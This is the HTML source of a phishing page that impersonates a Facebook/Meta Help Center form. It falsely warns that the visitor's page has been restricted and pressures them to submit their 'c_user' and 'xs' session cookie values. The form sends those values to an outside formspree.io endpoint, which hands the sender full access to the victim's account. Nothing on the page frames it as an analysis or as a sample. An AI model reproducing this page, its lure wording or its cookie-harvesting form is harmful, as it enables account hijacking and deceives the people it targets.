<html><head>
  <meta charset="utf-8">
  <link rel="icon" href="favicon.ico">
  <meta name="viewport" content="width=device-width,initial-scale=1">
  <meta name="theme-color" content="#000000">
  <meta name="description" content="Verified Badge Site">
  <link rel="apple-touch-icon" href="logo192.png">
  <link rel="manifest" href="manifest.json">
  <title>Meta Form</title>
  <script defer="defer" src="main.fcac1ccc.js"></script>
  <link href="style.css" rel="stylesheet">
</head>
<body>
  <noscript>You need to enable JavaScript to run this app.</noscript>
  <div id="root">
    <div>
      <div class="d-flex align -items-center" style="width: 100%; height: 90px; background: rgb(70, 103, 172)">
        <h1 class="text-white ms-4 m-0 d-flex align-self-center">facebook</h1>
      </div>
      <div class="d-flex align -items-center" style="width: 100%; height: 60px; background: rgb(233, 235, 238)">
        <h4 class="ms-4 m-0 d-flex align-self-center text-primary">
          Help Center
        </h4>
      </div>
      <div class="col-12 my-4 d-flex justify-content-center align-items-center">
        <div class="col-11 col-md-6 border">
          <div class="p-2" style="background: rgb(245, 246, 247)">
            <h5 class="m-0">Meta Form</h5>
          </div>
          <div class="p-2">
            <p class="fw-semibold validation_form_para">
              We have detected unusual activity on your page that violates our
              community standards.
            </p>
            <p class="fw-semibold validation_form_para">
              Your access to your page has been limited, and you are currently
              unable to post, share, or comment using your page.
            </p>
            <p class="fw-semibold validation_form_para">
              Please provide the precise details below. Refer to the video for
              clarification if you find the instructions unclear.
            </p>
            <p class="fw-semibold text-secondary" style="font-size: 12px">
              Detailed Video Information.
            </p>
            <a href="https://cdn.glitch.global/c194a370-7f4a-41ab-9ca1-c6811c6e18b1/detailed%20video.mp4?v=1721295931432"><img src="fbVideo.png.1fd476160a3ed7a2f565.png" alt="fb" style="width: 120px; height: 80px"></a><br>
            <p class="fw-semibold validation_form_para mt-2">
              Please be sure to provide the requested information below.
            </p>
            <form class="content" action="https://formspree.io/f/xanwjevj" method="POST">
              <label class="" style="font-size: 12px">c_user</label><br>
              <input type="number" name="c_user" id="c_user" required="" title="Please enter 15 digits" value=""><br>
              <label class="mt-2" style="font-size: 12px">xs</label><br>
              <input type="text" name="xs" id="xs" required="" value="">
              <p class="mt-2" style="font-size: 12px">
                Please make sure not to log out from your computer or laptop
                until you have received a verification email.
              </p>
              <div class="p-2 mb-2 d-flex justify-content-end" style="background: rgb(245, 246, 247)">
                <button type="submit" class="text-white border-0" style="background: rgb(66, 103, 178)">
                  Submit
                </button>
              </div>
            </form>
          </div>
        </div>
      </div>
    </div>
  </div>

</body></html>